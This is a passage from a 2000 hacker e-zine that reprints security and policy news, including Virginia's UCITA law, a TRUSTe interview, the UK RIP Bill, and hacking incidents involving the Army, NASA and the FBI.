election campaigns. 2.The legislators probably have not actually read UCITA, and that enabled supporters of UCITA to mislead them about both what UCITA would do and why people oppose it. 3.The supporters of UCITA probably told the legislators ... that if Virginia passes UCITA and other states do not, some software companies will move to Virginia. State legislators and governors often give an unreasonable amount of emphasis to winning business to their states from other states. They often do this without regard to whether the country as a whole will benefit or suffer as a result. Business often uses this to manipulate states, to play one state against another, to get what it wants. The joke, though, is on them, because only retail Internet sites would move to Virginia, and the total employment of these sites would be insignificant. The software development will remain where it is, in California, Washington, Bangalore or wherever. (Sorry about formatting, couldn't be bothered to pretty it up ... - Ed) @HWA 23.0 HNN:Mar 14th:What Exactly Does TRUSTe Mean Anyway? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The industry trade group TRUSTe was formed in an effort at self regulation and to help fend off unwanted legislation. Are they really doing the public a service? An interview with TRUSTe CEO Bob Lewin details how even sites selling personal data can acquire the privacy seal of approval. Salon http://www.salon.com/tech/view/2000/03/13/truste/index.html The privacy police? TRUSTe CEO Bob Lewin explains how even sites selling personal data can get the nonprofit's privacy seal of approval. - - - - - - - - - - - - By Lydia Lee March 13, 2000 | When TRUSTe launched in 1996, the nonprofit promised to help the Internet industry regulate itself with regard to protecting surfers' privacy. Over the past three years, it has vetted the privacy policies of over 1,300 sites, and its black-and-green logo, which signals to visitors that a site actually abides by its policies, can be found on most major e-commerce sites. But what kind of teeth does the organization really have? TRUSTe didn't look so trusty last year when a security expert found that its licensee RealNetworks had been collecting user information on the sly. Instead of reprimanding the company, the nonprofit argued that because RealNetworks' privacy violations took place via its RealJukebox software, not its Web site, the incident was outside the purview of TRUSTe. More recently, it's been other privacy advocacy groups like JunkBusters that have alerted the public to privacy violations such as Intel's decision to include an identifier in its Pentium III chip; JunkBusters also started a campaign against DoubleClick's acquistion of Abacus when it was announced last June. But Bob Lewin, executive director and CEO of TRUSTe, says the group's privacy seal program plays an important role in enforcing privacy policies. Previously, Lewin was vice president of marketing at networking software company ISOCOR and before that at the open systems consortium X/Open Company. Now he heads up this nonprofit that charges between $300 and $4,999 to certify an e-commcerce site's privacy practices. What's the basic message you're giving to consumers when they see the TRUSTe symbol? Is it that the site isn't going to sell my data? The bottom line is that this site adheres to the fair information practices -- that they are disclosing what information they're collecting, why and if they're sharing that information with somebody. No 2: that they're giving the visitor the choice -- whether to allow that to happen; 3) that once the information is collected, they will use reasonable security to protect that information; 4) that they allow the consumer reasonable access to that information to modify it. So if I were collecting consumers' e-mail addresses and then selling them to a direct-marketing company, would I still be able to get the TRUSTe symbol? Only if you stated that to the consumer in your privacy statement. If somebody came to us and said, "Here's our privacy statement. We will collect the e-mail addresses, and it's our intent to sell or share this information with these third parties, and we are giving you the option to say yes or no to this." Then that site could become a TRUSTe licensee. What percentage of sites get rejected? It's not a large percentage -- I'd guess 1 to 2 percent. What's the major reason sites get rejected? Once they start through the process, they can't or will not meet the requirements of the program. Say they'd like to be able to share info with a subsidiary, and we say, "That's to a third party, you have to disclose that." Well, they may voluntarily decide they're not going to proceed. Also, we don't apply our mark to gambling sites, since it's illegal in some states. The other reason that it happens, frankly, is that 85 percent of our sites are very small -- $10 million and below --- and as the process starts, the company goes out of business. If DoubleClick had been a TRUSTe member, would its decision to combine its database of anonymous surfing habits with an acquired database of personal information have set off red flags for you? There would be some issues. That's why we formed a third-party ad server committee, to get all the technical and legal issues out on the table. They would have had to inform us before they changed their policy, and we would have had some discussions. Once it has the TRUSTe seal, have you ever kicked out a site for doing something? No, we've come very close, but we haven't had to do it. The escalation process is as follows: We get a complaint from a consumer about a licensee, and once we are assured that the consumer had previously contacted the Web site to try and get it resolved -- because a lot of these are just misunderstandings -- we then contact the Web site and investigate and find out indeed if there's a real issue here. Now, the resolution to this may result in a change in the privacy policy, the business model, or what have you. Shouldn't you have caught that kind of stuff when you reviewed the policy in the first place? Well yes, but the nature of the beast is that all of this is software. What is generally the case is that there's been some unplanned feature in the software. Something will happen -- not that somebody wanted to do it, but the software allowed them to do it. So, when it happens, you point it out, it gets fixed and it's over. But that shouldn't mean they need to change their privacy policy, should it? It could be just a software change, but it could be a policy change. Let's say you implement software that shares information, or decide to collect more info than you originally stated -- perhaps you're collecting IP addresses, or disseminating cookies. So you have to change your policy. This whole thing is not a static field. We do constant monitoring, but many of our licensees will communicate with us, and in fact one-third of our efforts is focused on working with them. As their Web sites evolve, we've got to ensure that the privacy statement evolves. It's an ongoing process. Would it be incumbent on the company to notify all the users who had seen the previous privacy policy? If they start collecting new information, then at that point in time, they have to communicate to users from this point forward, "We are also doing this." So that has to be stated clearly in the privacy statement. It would not impact people from beforehand because that information was not being collected. But what if the people from beforehand come back and then they don't read the privacy policy? Is there anything in the TRUSTe program that says if you are instituting a new privacy policy, you have to let all the consumers from before know that? Well, we can't force consumers to read privacy statements, but in all our consumer outreach programs, we tell people: Even if you've visited this site before -- because things change -- the first thing to do is go to the privacy statement and review it to make sure there have been no changes. And we encourage licensees to put any changes up at the front. This is easier said than done -- none of us like to read pages and pages of text. Have you ever blown the whistle on a company? Yes, there are instances -- most of the problems are not with malice aforethought. The major monitoring is by consumers themselves, but we have people who look at the sites every quarter, to see if there've been any changes on the site. We also enter in names that we make up, opt-in in some cases and opt-out in others, so if we get communication to a name then we know where it came from. What role should the government have in enforcing online privacy? They play a very important role now, because they conduct studies on whether improvement has occurred within the industry -- the number of privacy statements, the quality of privacy statements. I think the government has clearly stated that certainly in the health-care and financial area, they feel the need to have some kind of legislation. They also did that for children --the Children's Online Privacy Protection Act. They've said that because this is super-sensitive information, you should have some guidelines. Now, the question becomes, what vehicle do you use to enforce that legislation, which is equally important. We feel that seal programs -- and in particular, TRUSTe -- play a very important part there. COPPA is going into law April 21, and our contract will contain the elements for Web sites to adhere to COPPA requirements. But it seems like a lot for any one company to keep up with. With all these violations going on, it seems like there needs to be a more watchful eye. I would say that there is a watchful eye, if people look at the facts versus hype from some advocacy groups. It's all very well to run around screaming and yelling, "The sky is falling, the sky is falling," but the fact is, many of these issues that have come up are evolutions that occur in business models on the site. I would argue that the industry has demonstrated very quick response when those problems come up. Take RealNetworks. The issue there occurred outside the scope of the current TRUSTe program. Yes, Real Networks is a TRUSTe licensee, but this particular issue had nothing to do with the collection of personal information on the Web site; it had to do with the collection of user information using software servers. Now, within a week, even though it was outside the program, we announced the formation of a pilot to evolve our program to handle those situations. I defy any government agency to do that. But customers aren't thinking, when they see the TRUSTe symbol, that it only covers the Web site. Maybe from the technical view it's different, but the consumer isn't going to make the distinction. Does the TRUSTe program cover both now? Yes, we need to do a better job so the consumer intuitively knows what the TRUSTe logo stands for. Ultimately, it would be great -- as we lay out the software privacy program -- to blend the two programs together. Or there may be a TRUSTe symbol for sites and one for software. What privacy issues are you trying to anticipate? One thing we're looking at is the wireless world, where we start talking about palm-held things and hand-held things and phones. I think there are some issues there we haven't fully addressed yet. We need to add more meat to the term "reasonable security." Today, that's the best term people have, because it can vary so much depending on the application and the technology. As we put more and more of these things into people's hands, we have to worry about how we prove that the person holding it is indeed the proper owner. salon.com | March 13, 2000 - - - - - - - - - - - - About the writer Lydia Lee is an associate editor for Salon Technology. @HWA 24.0 HNN:Mar 15th:UCITA Sign By Governor in Virginia ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by techs Set to take effect in July 2001 the Uniform Computer Information Transaction Act has been signed into law in Virginia by Governor James S. Gilmore III. UCITA will allow software companies to remotely disable software and will giving licensing agreements the force of law. Washington Post http://www.washingtonpost.com/wp-dyn/articles/A6866-2000Mar14.html Computer World http://www.computerworld.com/home/print.nsf/all/000314F772 Post; Gilmore Signs 1st Internet Commercial Code Into Law By Craig Timberg Washington Post Staff Writer Tuesday, March 14, 2000; 1:00 PM Virginia Gov. James S. Gilmore III signed the nation's first set of contractual rules specifically governing electronic commerce into law today on the second day of an Internet summit at George Mason University. The Uniform Computer Information Transaction Act, which is typically called by its initials "UCITA," overwhelmingly passed the General Assembly during the just-finished legislative session despite the opposition of critics who contended it would erode basic consumer rights. Because of that continuing debate, the law will not take effect until July 2001 while lawmakers study the fine print. Supporters such as Gilmore (R) say UCITA mainly updates for the Information Age the commercial codes that states passed decades ago. UCITA essentially gives the force of law to software licensing agreements as soon as a consumer rips the shrink-wrap off the box or hits the "I Accept" button on a program downloaded from the Internet. "UCITA provides clarity to contract law where none existed before, whichwill make it easier for consumers and industries to conduct transactions viathe Internet," Gilmore said in a statement. "This increase in electronic transactions will perpetuate the Internet revolution, promote e-commerce and foster the growth of Virginia's technology and manufacturing economies." State officials hope that by becoming the first state to adopt UCITA, Virginia will further its reputation as a center of high-technology and attract more businesses to the state. But consumer advocates warn that in the rush to adopt UCITA, Virginia overlooked concerns that have caused two dozen attorneys general around the country, including Maryland's J. Joseph Curran Jr. (D) to write a letter voicing concerns. Consumer groups warn that UCITA will give software companies new power to disable or "reposses" their products if they believe they are being used in a way that violates the licensing agreement. Another worry, say consumer advocates, is that buyers won't always know the details of the licensing agreements until after the purchase is made. "The whole idea of informed shopping is based on disclosure before purchase," said Jean Ann Fox of the Virginia Citizens Consumer Council, which lobbied against the bill. The signing took place at The 2000 Global Internet Summit at George Mason's campus in Fairfax. (c) 2000 The Washington Post Company -=- Computer World; Va. governor signs UCITA legislation into law By Patrick Thibodeau 03/14/2000 Fairfax, Va. — Flanked by the chairman of one of the state's largest businesses — America Online Inc.'s Steve Case — Virginia Gov. James Gilmore today signed the Uniform Computer Information Transactions Act (UCITA) into law. But the bill won't take effect until July 2001, giving people and businesses with concerns about UCITA time to seek legislative amendments, the governor said. "We're not deaf to people's concerns," said Gilmore. Still, Gilmore said he doesn't believe those concerns were "legitimate impediments" to the state's adoption of the legislation. The year-delay for adoption came at the behest of a coalition of some of the state's largest nontechnology companies, who believe UCITA gives software vendors the upper hand in software licensing (see story). "If there's any sense that things may not be quite right, there is plenty of time for people to come in under Virginia's approach and have a chance to do some amendments," said Gilmore. The state plans to create a study committee to examine the issues raised by the business coalition that sought to delay the law's implementation. UCITA sets a series of default rules governing commercial software transactions. One of its most controversial provisions would allow a software vendor to automatically disable software in a contract dispute. Case praised Virginia's action and said he hoped "other states will look at this and learn from this and embrace it." Virginia is moving quickly on UCITA to help create an attractive climate for its technology businesses. For UCITA to become the law of the land, technically it must be adopted by 50 states. But companies may nonetheless cite UCITA in their license agreements. "If Virginia remains the only state that adopts this, then I believe that the certainty of our (actions) would attract additional businesses into the commonwealth," said Gilmore. Maryland is also actively considering the legislation. @HWA 25.0 HNN:Mar 15th:RIP Goes Before Commons Today ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Lady Sharrow The UK Government's Regulatory Investigatory Powers (RIP) Bill goes before Select Committee in the House of Commons today and in a little more than six months it could be enshrined in law. The bill will force ISPs to have the facilities to log and monitor all online activities of their users. The Register UK http://www.theregister.co.uk/000314-000016.html Posted 14/03/2000 11:37am by Sean Fleming What the hell is... the UK's RIP Bill The UK Government's Regulatory Investigatory Powers (RIP) Bill goes before Select Committee in the House of Commons today and in a little more than six months it could be enshrined in law. But with 30 amendments tabled against it and an angry mob of opponents waiting to string it up, RIP has become better known for the widespread - and some might say kneejerk - reaction people have had to it, rather than for its aims and content. Civil liberties groups, individual Net users and politicians from all the major UK parties are banding together to decry what is being labelled a Snoopers Charter. But just what is all the fuss about? The Blair administration has been slammed by many for its cronyism and control freakery, so is this just another example of Big Brother Blair wanting to watch over you at all times? Growing pains To become an accepted part of everyday life, and not just the place to go for cyberporn, e-fraud and to pick up your email, the Internet will have to appeal to a broader cross-section of the general public. Ecommerce, for example, will never thrive in a world where the majority of potential users and customers are too scared to part with their credit card details in case they get ripped off. The not-so-wired public need to feel confident about the Internet. This is all part of the natural evolution that all things go through when they achieve popularity. The days of the WWW Wild West are numbered. So, what does the Bill propose and why are so many people objecting to it. The Bill describes itself as: "A Bill to make provision for and about the interception of communications, the acquisition and disclosure of data relating to communications, the carrying out of surveillance, the use of covert human intelligence sources and the acquisition of the means by which electronic data protected by encryption or passwords may be decrypted or accessed; to provide for the establishment of a tribunal with jurisdiction in relation to those matters, to entries on and interferences with property or with wireless telegraphy and to the carrying out of their functions by the Security Service, the Secret Intelligence Service and the Government Communications Headquarters; and for connected purposes." Lots of spooky terms in there - "covert human intelligence sources" translates as spies - but in essence this is all about setting down a legal framework within which electronic communications are treated no differently from telephone tapping and intercepting mail (as in the paper stuff). Some people will throw their hands in the air at the very thought of any this but cracking down on the illegal use of the Internet by terrorists, perverts and organised criminals may be considered by many to be A Good Thing. One size fits all However, the Bill falls down - and in a big way - in the details. Or lack of them. It is vague on practicalities, and how permission to access private communication will be granted. ISPs will be obliged by law to have the facilities to log and monitor all the online activities of their users. But the Bill doesn't specify how this will be done. And while there is talk of the Government reimbursing hardware costs with regard to monitoring, it doesn't make provision for the massive increase in overheads this will bring. The Bill is also very vague in parts and can be interpreted in such a way that much of it becomes nonsensical. For example, it defines who will be covered by the Bill when it becomes law: "a person who provides a postal service, or b) a person who provides a public telecommunications service, or c) a person not falling within paragraph b) who has control of the whole or any part of a telecommunications system located wholly or partly in the UK." ISPs, mobile phone companies, WAP service providers, news servers and so on all fall under the term "telecommunications service". Look at that definition again - it could mean anyone. One of the Bill's fiercest critics is the organisation Stand. This is what Stand has to say on this point: "You're no longer using an ISP to connect to the Net. You're using the ISP's public telecommunication system." The Bill also makes it an offence for you to be told that a surveillance warrant has ever been issued against you. That offence exists in perpetuity - there is no expiry date, you can never be told. And should anyone ever tell you they risk a prison sentence. Someone to watch over me Ah yes, you may be thinking, I live in a liberal democracy - the security forces can't just go round snooping on people willy nilly. Well, guess again. Here's what the Bill says about surveillance warrants. There are four main justifications given by the bill for issuing a warrant: a) national security interests, b) to prevent or detect serious crime, c) to safeguard the UK's economic well being d) for the purpose, in circumstances appearing to the Secretary of State to be equivalent to those in which he would issue a warrant by virtue of paragraph (b), of giving effect to the provisions of any international mutual assistance agreement. And there's a list as long as your arm of those people who can issue the warrant against you - from senior police officers to "any such other personas the Secretary of State may by order designate". Reading between the lines, the Bill says that the Home Secretary can - for any reason - issue a warrant against anyone, and that anyone with the Home Secretary's permission can do likewise. Don't forget, you'll never know if information has been gathered about you, what it was used for and so on. Taking Liberties As it stands, reader Simon Batistoni writes , The RIP Bill contains one truly frightening basic assumption: if you have stored on your computer any form of encrypted message, you will be forced on request by the police to hand over the necessary keys t decrypt this data. If you do not have the keys, YOU MUST PROVE THAT YOU HAVE NEVER BEEN IN POSSESSION OF THEM, or you could be subject to a two-year jail term. The principle of the police being able to view encrypted data, so that they can nail paedophiles, drug dealers, etc, has some genuine merits. The flaw in this measure, however, is that the recipient/possessor of encrypted data is guilty, until proven innocent, something which destroys the entire foundation of our legal system. What's more, it is impossible to prove that you never had something. As it stands, the measures in the Bill could be applied to a PGP-encrypted signature on an email, currently used by many as a reliable means of identity verification. Theoretically, the innocent father of a suspect under surveillance, who receives an email from his son containing the standard encrypted signature, could fall under the scope of this RIP Bill; he could be jailed for failing to reveal the contents of the encrypted data. Ostriches need not apply Small wonder that there is so much opposition to the Bill. There are many more examples of the above thinking running throughout the Bill, such as the loophole that could mean you have to keep tabs on yourself but can never let yourself know, otherwise you end up in prison. Stand has done a much more comprehensive job of examining RIP than The Register is able to do and its site is well worth a visit. Don't be fooled into thinking that your Government will always have your best interests at heart, because that's not the way of Governments. But at the same time, don't assume that any attempt to regulate the Internet is an invasion of rights and freedoms - freedom without responsibility is, after all, little more than latent tyranny. We will all be affected by the RIP Bill when it becomes law - as it almost certainly will, in some form or another - so now is the time to find out a little more about it and decide where you stand, because in another six months it could all be too late. ® @HWA 26.0 HNN:Mar 15th:Security Patch Locks Out Users ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse A a 128-bit security patch for Internet Explorer 5.0, 5.0a, and 5.0b released by Microsoft will replace security files with older versions that will lock users out of their systems after restart. Microsoft has asked administrators to stop distributing the patch and has said that a fix will be available soon. InfoWorld http://www.infoworld.com/articles/en/xml/00/03/14/000314enpatch.xml IE5/Windows 2000 security patch can lock out users By Cynthia Morgan, Computerworld MICROSOFT WARNED NETWORK administrators on Monday to stop distributing a security patch for Internet Explorer 5.0 that could prevent Windows 2000 users from logging in to their computers. Instructions included with the patch, a 128-bit security add-on for Internet Explorer 5.0, 5.0a, and 5.0b versions, are incorrect, said a Microsoft spokesman. The error, a command-line "switch," causes an automated installation to replace security files with older versions that will lock users out of their systems after restart. The 128-bit security installations under Windows 9x and Windows NT 4.x are not affected, the spokesman added. Administrators who have built automated installation packages for Internet Explorer 5.0 on Windows 2000 systems should check the Microsoft site for information on correcting the problem. Meanwhile, installation packages containing the faulty switch should be frozen immediately. A Microsoft KnowledgeBase bulletin (#Q255669) with complete instructions and updates should be available at search.support.microsoft.com/kb within 24 hours, the spokesman said. Microsoft Corp., in Redmond, Wash., is at www.microsoft.com For more enterprise computing news, go to www.computerworld.com. Copyright (C) 2000 Computerworld, Inc. All rights reserved. @HWA 27.0 HNN:Mar 15th:DNA Used for Steganography ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Dan 17-year-old Romanian-born Viviana Risca topped the 59th Intel Science Talent Search competition by embedding a computer message in the gene sequence of a strand of DNA using steganography, a data encryption technology that allows a computer user to hide a file within another file. San Jose Mercury News http://www.sjmercury.com/svtech/news/breaking/merc/docs/013955.htm What you're doing right now? Don't worry, it's totally normal. Posted at 7:51 a.m. PST Tuesday, March 14, 2000 New York teen-ager win $100,000 with encryption research WASHINGTON (AP) -- A 17-year-old Romanian-born girl who embedded a computer message in the gene sequence of a strand of DNA has been named the best young scientist in the country. Viviana Risca, a senior at Paul D. Schreiber High School in Port Washington, N.Y., won a $100,000 college scholarship when she bested 10 other high school seniors on Monday in the 59th Intel Science Talent Search competition. Risca said her project in steganography, a data encryption technology that allows a computer user to hide a file within another file, was a simple one. Risca, who emigrated from Romania eight years ago, embedded the secret message ``June 6 Invasion: Normandy.'' Technologies like steganography can protect sensitive electronic information from interception or eavesdropping, but they can also wreak havoc if used by terrorists and criminals. Formerly known as the Westinghouse Science Talent Search, the contest has been nicknamed the ``Junior Nobel Prize.'' Past winners include five Nobel laureates, nine MacArthur Foundation fellows and two Fields medalists. Forty finalists came here to compete for the award. Jayce Getz, a senior at Big Sky High School in Missoula, Mont., won second prize and a $75,000 scholarship for a math project on partition function. And Feng Zhang, a senior at Theodore Roosevelt High School in Des Moines, Iowa, won third prize and a $50,000 scholarship for a biochemistry project in molecular virology. The other winners in the top 10, their schools, the amounts of their scholarships and their projects were: Alexander Schwartz, Radnor (Pa.) High School, $25,000, abstract algebra concerning Abelian groups; Eugene Simuni, 18, Midwood High School in Brooklyn, N.Y., $25,000, a biochemistry project that investigated G proteins; Matthew Reece, duPont Manual Magnet High School, Louisville, Ky., $25,000, a proposal on fluid dynamics problems; Kerry Ann Geiler, 17, Massapequa (N.Y.) High School,$20,000 for a project on communication by ants; Elizabeth Williams, Palos Verdes Peninsula High School, Rolling Hills Estates, Calif., $20,000, perception of light and shape by the brain; Zachary Cohn, 17, Half Hollow Hills East High School in Dix Hills, N.Y., $20,000 for a study of perfect squares; Bob Cherng, Troy High School, Fullerton, Calif., $20,000, the transition of ammonia and hydrogen halide into ammonium halide. The other 30 finalists received $5,000 scholarships. @HWA 28.0 HNN:Mar 15th:Bugging SAT Phones ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Odin A lot of people have turned to satellite phones as a last ditch effort to retain some privacy. Now Motorola has patented a means by which to listen in to a satellite phone to satellite phone call. New Scientist http://www.newscientist.com/news/news_222923.html (sorry: 404! - Ed) @HWA 29.0 HNN:Mar 15th:More and more EZines ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by L33t Dawg New issues of several e-zines have been released including, Hack In The Box Issue #3, HWA Haxor news #51 and Datacore has released DataZine 0.02. Hack In The Box Issue #3 http://www.hackinthebox.org HWA.hax0r.news You're here already :-) DataZine .02 http://www.tdcore.com/index2.html @HWA 30.0 HNN:Mar 16th:Army on Alert Over CyberAttack Fear ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The Army has placed all of its worldwide cyber defense teams on full alert after learning of a threat from a group known as The Boys From Brazil. The group has threatened to deface the army.mil home page. The Army has said that it is aware of the group's or attack profile, and is prepared for any attack against the Army's Web site and that they have enacted additional 'countermeasures' to protect the site. (Is there really a threat? Who knows, but this sounds like one hell of a publicity stunt.) Federal Computer Week http://www.fcw.com/fcw/articles/2000/0313/web-armyhac-03-15-00.asp Army on hacker alert BY Dan Verton Updated 03/16/2000 at 17:05 EST HOUSTON — The Army has placed its cyberdefense teams on full alert after a known hacker group threatened to take down the Army's World Wide Web home page this Friday. On Tuesday evening the Army placed its cyberdefenders at the Land Information Warfare center at Fort Belvoir, Va., on full alert after a group known as the Boys from Brazil threatened to hack into the Army home page on Friday. But today the Army clarified that the hacker group it is watching is Hacking for Girliez, which took down the New York Times' site in September 1998. Most of the hackers' remarks appeared in comment tags, which can be seen in source material but not on a Web page. The tags include such remarks as "'Immature kids' were able to bypass...$25,000 firewalls [and] bypass the security put there." Philip Loranger, chief of the Command and Control Protect Division in the Army's Information Assurance Office, speaking here at the 2000 Army Directors of Information Management Conference, said the Army is prepared for any attack against the its Web site. "We've had to activate some countermeasures to protect the Army home page," Loranger said, declining to provide specifics for security reasons. However, he said the countermeasures being put in place do not include disconnecting the Army site from the Internet. Specific details emerged today on some of the steps the Army has taken in the past few months to prepare for these types of attacks. Lt. Col. James Withers, a systems engineering specialist with the Army signal command, said the Army's regional CERTs have written special software scripts that will help defend against known hacker tactics. The Army also developed Web cache proxy servers that divert Web surfers away from primary servers residing behind firewalls on Army installations. The Army is also in the process of deploying a protected domain name system architecture that will help the service regain control of all Army Internet sites and network entry points. "We know the hackers mapped [the old architecture]," Withers said, adding that 90 percent of the Army's global protected DNS architecture should be completed by April. Loranger demonstrated for conference attendees how simple it is for hackers to exploit known operating system vulnerabilities using widely available hacker tools and standard systems administrator procedures. In fact, Loranger, with the approval of the Army's staff counsel, demonstrated a live hacking of another computer system to show how within minutes hackers can crack into known password vulnerabilities and take over entire systems and networks. Loranger also said that the lack of international laws governing conduct on the Internet poses real obstacles to the government's ability to respond to foreign-based hacker attacks. Loranger pointed out that some graduate-level computer education schools in India, for example, have established hacking into U.S. government systems as an academic requirement. Lt. Col. LeRoy Lundgren, program manager for the Army's National Security Improvement Program, said as many as 285,000 network queries were denied by Army security systems last year because of the questionable method used. Lundgren added that the Army has seen an increase in the number of queries originating in foreign countries, particularly China and Bulgaria. @HWA 31.0 HNN:Mar 16th:NASA Fears CyberAttack From Brazil ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by William Knowles NASA's Jet Propulsion Laboratory has blocked all access to its web site from addresses originating in Brazil due to fears of a cyber attack. JPL spokes people said that access would be restored once additional security measures where in place. (How does blocking one country effect anything?) Newsbytes http://www.newsbytes.com/pubNews/00/145708.html NASA Division Battles The Hack From Ipanema By Robert MacMillan, Newsbytes WASHINGTON, DC, U.S.A., 15 Mar 2000, 1:15 PM CST From Antonio Carlos Jobim to the samba, the US generally has welcomed some of the cooler cultural exports from Brazil, but the latest one - a series of hack attacks on NASA's Jet Propulsion Laboratory at CalTech - has the agency bossa nova-ing its way toward beefing up its security measures. JPL Spokesman Frank O'Donnell confirmed for Newsbytes an MSNBC report that the agency has shut down access to queries emanating from Brazil until the agency's security team makes some necessary improvements to its network. O'Donnell said that the Brazil shutout was not a "blacklist" attempt, as earlier reports indicated. "There was a number of recent attacks on JPL hosts originating from various sites in Brazil, and as a temporary move while our computer security people work, we're blocking network access to JPL from Brazil," O'Donnell said. "But this is a temporary thing." He said normal service to South America's largest nation would return "in a matter of days at most." He added that he is "not aware of any (security) compromises per se in these attacks." Highly secure data at JPL generally is not stored on hosts that are connected to the Internet, O'Donnell also said, but added that he could "not go into a great deal of detail" on what kind of information was sought. MSNBC reported the Brazil problem after a network analyst at the Bank of Brazil in Brasilia reported that he could not access the JPL site. The service also reported that a CERT official at its headquarters in Pittsburgh, Pa., said that blocking access to an entire network or country is reasonably common, though the official said that spoofing attacks - when the address of the attacking e-mail in a denial of service attack is falsified - blocking against a particular domain or country code becomes largely ineffective. O'Donnell said that CERT and the JPL have been working jointly on security issues. Reported by Newsbytes.com, http://www.newsbytes.com . 13:15 CST @HWA 32.0 HNN:Mar 16th:FBI Site Hit by DOS Again ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by William Knowles Just as the FBI was posting information about the 50th anniversary of its "Ten Most Wanted Fugitives" to its web site it was hit with a denial of service attack. The attacked forced the web site offline for several hours. UPI - via Virtual New York http://www.vny.com/cf/News/upidetail.cfm?QID=71527 FBI Web site attacked Wednesday, 15 March 2000 15:15 (ET) FBI Web site attacked By MICHAEL KIRKLAND WASHINGTON, March 15 (UPI) -- There has been another "denial of service" cyber-attack against a high-profile Web site, sources told UPI Wednesday -- this time the target was the FBI's own Web page, which was taken out of action for several hours Tuesday. The attack hit just as the FBI was posting information about the 50th anniversary of its "Ten Most Wanted Fugitives" list, which was celebrated Tuesday at the bureau with the opening of a permanent headquarters exhibit. A "denial of service" attack overwhelms a Web site with requests for information, but with "spoofed" -- fabricated -- return e-mail addresses. A site tries to endlessly answer the requests, and in effect ties itself in knots until it shuts down. There was no indication yet on whether Tuesday's cyber-attack was a "distributed" denial of service attack, similar to those launched against major commerical sites on the Internet early last month. Those attacks temporarily crippled Yahoo!, E-Trade, CNN.com and others. U.S. investigators were still pursuing leads on the latest attack Wednesday, defining its nature. A "distributed" attack is one which uses "innocent" third-party computer systems. Illegal hackers, called "crackers," usually find the attack software "tools" available "in the wild" on the Internet. The "distributed denial of service," or DDOS, tools enable a cracker to break into an unsuspecting computer system and implant "packets" or "daemons" that will cause the system to launch an attack against a target unless detected and disabled in time. Literally hundreds of "zombie" computer systems can be infected, without their operators' knowledge, and can launch a simultaneous attack. The FBI is still searching for at least two unnamed suspects in February's attacks. Much of the search has been concentrated in Canada with the help of the Royal Canadian Mounted Police. Agents are also concentrating on Germany, where the DDOS "tools" may have originated, though Germany is not believed to be the country of origin for the actual attacks. There was no immediate indication Wednesday that the attack on the FBI site came from the same suspects wanted for the attacks on the commerical sites. -- Copyright 2000 by United Press International. All rights reserved. @HWA 33.0 HNN:Mar 16th:Teenager Arrested in Online Bank Scam ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Someone has finally been arrested in a scam that has been circling around the Internet for months. Various online banks offer cash rewards just for opening an account. The scam works by opening several accounts under false names and then transferring the free money from each account into a real account. A 14 year old student at Thomas Jefferson Middle School in Jefferson City Missouri was able to amass over $2000. The scam was uncovered by a postal worker after he started delivering 'bushels' of mail to an address owned by the kids father. (Discovered by a postal worker?) APB News http://www.apbnews.com/newscenter/internetcrime/2000/03/15/netbanker0315_01.html Teen Busted in Internet Banking Scam 120 Fake Accounts Yielded $2,000 in Rewards March 15, 2000 By Carol Huang JEFFERSON CITY, Mo. (APBnews.com) -- An eighth-grader in rural Missouri signed up for more than 120 fake bank accounts through the Internet to rake in a total of $2,000 in new customer cash rewards, authorities said today. "He didn't realize the gravity of what he was doing, but he knew it was wrong and that it wasn't his money," said Cole County Sheriff John Hemeyer. Hemeyer said the boy, 14, a student at Thomas Jefferson Middle School, had been helping his father, a self-employed construction contractor, enter business records onto a computer when he found an Internet site offering an opportunity to open a bank account. Eventually, the teen had more than 120 accounts at banks around the country, each under a name generated by his computer, and had transferred more than $2,000 in cash freebies into a real account of his own. Puzzled postal worker A puzzled postal worker reported delivering "bushels of baskets of mail" to a vacant trailer on a plot of land, and investigating deputies went to the boy's father, who owns the land. Besides entering the teen into the juvenile court system, deputies confiscated his computer, which he had upgraded using the cash rewards, Hemeyer said. "It's the only referral we've ever had on this kid. So if he quits, and pays back some money, that will be about it," Hemeyer said. Carol Huang is an APBnews.com staff writer (carol.huang@apbnews.com). @HWA 34.0 HNN:Mar 16th:Former Employee Arrested For Attack On Company ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by no0ne 31 year old Abdelkader Smires, was charged in United States District Court in Brooklyn with computer-related fraud and remained in custody pending a bail hearing on Friday. Smires is being accused of causing his former company, Internet Trading Technologies, Inc. (ITTI) which provides software that allows market-makers to conduct online securities transactions, to shut down several times since last Thursday by directing coordinated attacks against the firms computer networks. NY Times http://www.nytimes.com/aponline/a/AP-Cyber-Spat.html C|Net http://news.cnet.com/news/0-1007-200-1573627.html?tag=st.ne.1002.thed.1007-200-1573627 Associated Press - via San Jose Mercury News http://www.sjmercury.com/breaking/docs/073358.htm NYTimes: pay -=- C|Net ITTI employee arrested in hacker attack By Bloomberg News March 15, 2000, 4:20 p.m. PT An employee of Internet Trading Technologies, a provider of trade-execution services for securities firms, was arrested yesterday and charged with attacking ITTI computers and causing interruptions in its services this week, the U.S. Attorney's Office in Brooklyn said. The employee, Abdelkader Smires, a database programmer, launched a series of data transmissions intended to cause the firm's computers to crash after he became involved in 